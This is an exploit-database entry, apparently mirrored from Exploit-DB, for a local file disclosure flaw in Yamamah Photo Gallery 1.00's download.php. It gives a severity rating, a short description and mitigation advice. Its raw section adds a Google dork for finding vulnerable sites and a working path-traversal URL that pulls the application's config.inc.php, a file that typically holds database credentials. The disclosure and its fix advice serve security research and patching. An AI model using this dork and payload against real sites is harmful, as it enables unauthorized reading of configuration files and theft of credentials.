header-logo
Suggest Exploit
vendor:
Yamamah Photo Gallery
by:
mat
5.5
CVSS
MEDIUM
Local File Disclosure
22
CWE
Product Name: Yamamah Photo Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability

The vulnerability allows an attacker to disclose local files on the target system by exploiting a flaw in the 'download.php' script of Yamamah Photo Gallery version 1.00. By manipulating the 'download' parameter, an attacker can traverse the file system and access sensitive files.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or upgrade to a newer version of Yamamah Photo Gallery that addresses this issue. Additionally, it is advised to restrict access to the 'download.php' script and implement proper input validation and sanitization.
Source

Exploit-DB raw data:

|=---------------------------------------------------------------------------=|
 Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
|=---------------------------------------------------------------------------=|
|=------------------------------=[ by mat ]=---------------------------------=|

Google dork: "Powered By : Yamamah Version 1.00"


http://[target]/[path]/themes/default/download.php?download=[File Disclosure]
http://[target]/[path]/themes/default/download.php?download=../../includes/config.inc.php

Navigation

Suggest Exploit

Services By CQR